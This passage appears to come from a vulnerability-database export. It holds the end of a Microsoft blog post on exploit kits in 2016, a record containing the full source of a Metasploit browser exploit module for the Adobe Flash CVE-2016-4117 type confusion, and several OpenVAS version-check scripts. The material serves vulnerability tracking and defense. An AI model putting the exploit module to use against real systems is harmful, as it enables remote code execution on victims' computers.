vulnerabilities is lower than in previous years.\n\nOf the major exploits used by kits in 2016, one is relatively old\u2014an exploit for a Microsoft Internet Explorer bug that was disclosed and patched back in 2014 (CVE-2014-6332). Four major kits use an exploit for the Adobe Flash vulnerability CVE-2015-8651, which was patched back in 2015.\n\nThree exploits disclosed in 2016 were seen in exploit kits, showing that operators still attempt to continually improve their tools. 
One of these is a zero-day exploit for Adobe Flash (CVE-2016-1019) used by Pangimop at least five days before it was patched. However, this particular zero-day is a \u201cdegraded\u201d exploit, which means that it worked only on older versions of Adobe Flash. The exploit did not affect the latest version of the software at the time, because Adobe had previously introduced stronger exploit mitigations, which Microsoft helped build.\n\n**Major exploits used by exploit kits**\n\n**Exploit** | **Targeted product** | **Exploit kit** | **Date patched** | **Date first seen in exploit kit** \n---|---|---|---|--- \nCVE-2014-6332 | Microsoft Internet Explorer (OLE) | NeutrinoEK | November 11, 2014 ([MS14-064](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx?f=255&MSPPError=-2147217396>)) | November 19, 2014 \nCVE-2015-8651 | Adobe Flash | Axpergle, NeutrinoEK, Meadgive, SteganoEK | December 28, 2015 ([APSB16-01](<https://helpx.adobe.com/security/products/flash-player/apsb16-01.html>)) | December 28, 2015 \nCVE-2016-0189 | Microsoft Internet Explorer | NeutrinoEK | May 10, 2016 ([MS16-051](<https://technet.microsoft.com/en-us/library/security/ms16-051.aspx>)) | July 14, 2016 \nCVE-2016-1019 | Adobe Flash | Pangimop, NeutrinoEK | April 7, 2016 ([APSB16-10](<https://helpx.adobe.com/security/products/flash-player/apsb16-10.html>)) | April 2, 2016 (zero-day) \nCVE-2016-4117 | Adobe Flash | NeutrinoEK | May 12, 2016 ([APSB16-15](<https://helpx.adobe.com/security/products/flash-player/apsb16-15.html>)) | May 21, 2016 \n \nWe did not see exploit kits targeting Microsoft\u2019s newest and most secure browser, Microsoft Edge, in 2016. Only a few days into the new year, however, SundownEK was updated to include an exploit for an old vulnerability that had been patched a couple of months prior. Microsoft Edge applies patches automatically by default, rendering the exploit ineffective on up-to-date installations.\n\nIt was also SundownEK that integrated steganography in late 2016. 
Steganography, a technique that is not new but is getting more popular with cybercriminals, hides information like malicious code or encryption keys in images.\n\nInstead of loading the exploit directly from a landing page, SundownEK downloads an image that contains the exploit code. This method is employed to avoid detection.\n\n## Stopping exploit kits with updates and a secure platform\n\nWhile we see a willingness among cybercriminals to switch from exploit kits to spam and other vectors, there is a clear desire to continue using kits. We see cybercriminals switch from one kit to another, replacing kits as they become unavailable. Meanwhile, exploit kit authors continue to keep their wares attractive to cybercriminals by incorporating new exploits.\n\nKeeping browsers and other software up-to-date can counter the impact of exploit kits. [Microsoft Edge](<https://technet.microsoft.com/itpro/microsoft-edge/index>) is a secure browser that gets updated automatically by default. It also has multiple built-in [defenses](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>) against exploit kits that attempt to download and install malware. These defenses include on-by-default sandboxing and state-of-the-art exploit mitigation technologies. 
Additionally, [Microsoft SmartScreen](<https://blogs.windows.com/msedgedev/2015/12/16/smartscreen-drive-by-improvements/#3FYqD02TC1A6VsaL.97>), which is used in both Microsoft Edge and Internet Explorer 11, blocks malicious pages, such as landing pages used by exploit kits.\n\nAt the same time, running a secure platform like Windows 10 enables users to benefit from advanced security features.\n\n[Windows Defender](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) uses IExtensionValidation (IEV) in Microsoft Internet Explorer 11 to detect exploits used by exploit kits. Windows Defender can also detect the malware that exploit kits attempt to download and execute.\n\nWindows 10 Enterprise includes [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>), which can lock down devices and provide kernel-level virtualization based security.\n\n[Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) alerts security operation teams about suspicious activities, including exploitation of vulnerabilities and the presence of malware, allowing them to detect, investigate, and respond to attacks.\n\n \n\n_MMPC_\n\n \n\n## Related blog entries:\n\n * [World Backup Day is as good as any to back up your data](<https://blogs.technet.microsoft.com/mmpc/2017/03/28/world-backup-day-is-as-good-as-any-to-back-up-your-data/>)\n * [Ransomware: a declining nuisance or an evolving menace?](<https://blogs.technet.microsoft.com/mmpc/2017/02/14/ransomware-2016-threat-landscape-review/>)\n * [Averting ransomware epidemics in corporate networks with Windows Defender ATP](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": 
"LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-23T22:37:34", "title": "Exploit kits remain a cybercrime staple against outdated software \u2013 2016 threat landscape review series", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2014-6332", "CVE-2016-0189", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2017-01-23T22:37:34", "href": "https://blogs.technet.microsoft.com/mmpc/2017/01/23/exploit-kits-remain-a-cybercrime-staple-against-outdated-software-2016-threat-landscape-review-series/", "id": "MMPC:A8911A071FAE866BC15F59CA0B325D45", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2021-12-21T13:32:55", "description": "This Metasploit module exploits a type confusion on Adobe Flash Player, which was originally found being successfully exploited in the wild. 
This module has been tested successfully on: macOS Sierra 10.12.3, Safari and Adobe Flash Player 21.0.0.182, Firefox and Adobe Flash Player 21.0.0.182.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-02-09T00:00:00", "type": "zdt", "title": "Adobe Flash Player DeleteRangeTimelineOperation Type Confusion Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2019-02-09T00:00:00", "id": "1337DAY-ID-32146", "href": "https://0day.today/exploit/description/32146", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion',\n 'Description' => %q(\n This module exploits a type confusion on Adobe Flash Player, which was\n originally found being successfully exploited in the wild. 
This module\n has been tested successfully on:\n macOS Sierra 10.12.3,\n Safari and Adobe Flash Player 21.0.0.182,\n Firefox and Adobe Flash Player 21.0.0.182.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Genwei Jiang', # FireEye original blog details on the vulnerability\n 'bcook-r7' # Imported Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2016-4117'],\n ['BID', '90505'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'],\n ['URL', 'http://www.securitytracker.com/id/1035826'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'],\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['osx'],\n 'BrowserRequirements' =>\n {\n source: /script|headers/i,\n os_name: lambda do |os|\n os =~ OperatingSystems::Match::MAC_OSX\n end,\n ua_name: lambda do |ua|\n case target.name\n when 'Mac OS X'\n return true if ua == Msf::HttpClients::SAFARI\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n flash: lambda do |ver|\n case target.name\n when 'Mac OS X'\n return true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [\n 'Mac OS X', {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Apr 27 2016',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri.end_with? 
'swf'\n print_status('Sending SWF...')\n send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache')\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache')\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(3..7)}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n\n if target.name.include? 'osx'\n platform_id = 'osx'\n end\n html_template = %(<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n )\n\n return html_template, binding\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf')\n File.binread(path)\n end\nend\n", "sourceHref": "https://0day.today/exploit/32146", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-10-24T21:26:05", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-05-12T00:00:00", "type": "openvas", "title": "Adobe Flash Player Security Updates( apsa16-02 )-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310808100", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310808100", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Security Updates( apsa16-02 )-Linux\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808100\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-4117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-05-12 15:58:15 +0530 (Thu, 12 May 2016)\");\n script_name(\"Adobe Flash Player Security Updates( apsa16-02 )-Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n 
script_tag(name:\"insight\", value:\"The flaw exists due to an unspecified\n vulnerability\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to execute arbitrary code and\n also some unknown impact.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 20.x through\n 21.0.0.240 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 21.0.0.241, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"20.0\", test_version2:\"21.0.0.240\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"21.0.0.241\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:15", "description": "This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-05-13T00:00:00", "type": "openvas", "title": "Adobe Air Security Updates( apsb16-15 )-MAC OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1100", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", 
"CVE-2016-4113", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-1099"], "modified": "2018-10-18T00:00:00", "id": "OPENVAS:1361412562310808102", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808102", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_air_apsb16-15_macosx.nasl 11969 2018-10-18 14:53:42Z asteins $\n#\n# Adobe Air Security Updates( apsb16-15 )-MAC OS X\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808102\");\n script_version(\"$Revision: 11969 $\");\n script_cve_id(\"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n\t\t\"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n\t \"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n\t\t\"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n\t\t\"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n\t\t\"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n\t\t\"CVE-2016-4117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-18 16:53:42 +0200 (Thu, 18 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-13 10:48:15 +0530 (Fri, 13 May 2016)\");\n script_name(\"Adobe Air Security Updates( apsb16-15 )-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A buffer overflow vulnerability.\n\n - Multiple memory corruption vulnerabilities.\n\n - A vulnerability in the directory 
search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air version before\n 21.0.0.215 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version\n 21.0.0.215 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Air/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"21.0.0.215\"))\n{\n report = report_fixed_ver(installed_version:airVer, fixed_version:\"21.0.0.215\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:11", "description": "This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-05-13T00:00:00", "type": "openvas", "title": "Adobe Air Security Updates( apsb16-15 )-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1100", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4111", "CVE-2016-1108", 
"CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-1099"], "modified": "2018-10-18T00:00:00", "id": "OPENVAS:1361412562310808101", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808101", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_air_apsb16-15_win.nasl 11969 2018-10-18 14:53:42Z asteins $\n#\n# Adobe Air Security Updates( apsb16-15 )-Windows\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808101\");\n script_version(\"$Revision: 11969 $\");\n script_cve_id(\"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n\t\t\"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n\t\t\"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n\t\t\"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n\t\t\"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n\t\t\"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n\t \"CVE-2016-4117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-18 16:53:42 +0200 (Thu, 18 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-13 10:42:48 +0530 (Fri, 13 May 2016)\");\n script_name(\"Adobe Air Security Updates( apsb16-15 )-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A buffer overflow vulnerability.\n\n - Multiple memory corruption vulnerabilities.\n\n - A vulnerability in the directory search 
path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air version before\n 21.0.0.215 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version\n 21.0.0.215 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air/Win/Installed\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"21.0.0.215\"))\n{\n report = report_fixed_ver(installed_version:airVer, fixed_version:\"21.0.0.215\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:25:09", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-05-13T00:00:00", "type": "openvas", "title": "Adobe Flash Player Security Updates( apsb16-15 )-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1100", "CVE-2016-4121", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-4120", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4163", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4160", 
"CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4162", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-4161", "CVE-2016-1099"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310808104", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808104", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Security Updates( apsb16-15 )-Linux\n#\n# Authors:\n# kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808104\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n \"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n \"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n \"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n \"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n \"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n \"CVE-2016-4117\", \"CVE-2016-4120\", \"CVE-2016-4121\", \"CVE-2016-4160\",\n \"CVE-2016-4161\", \"CVE-2016-4162\", \"CVE-2016-4163\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-05-13 10:56:22 +0530 (Fri, 13 May 2016)\");\n script_name(\"Adobe Flash Player Security Updates( apsb16-15 )-Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A buffer 
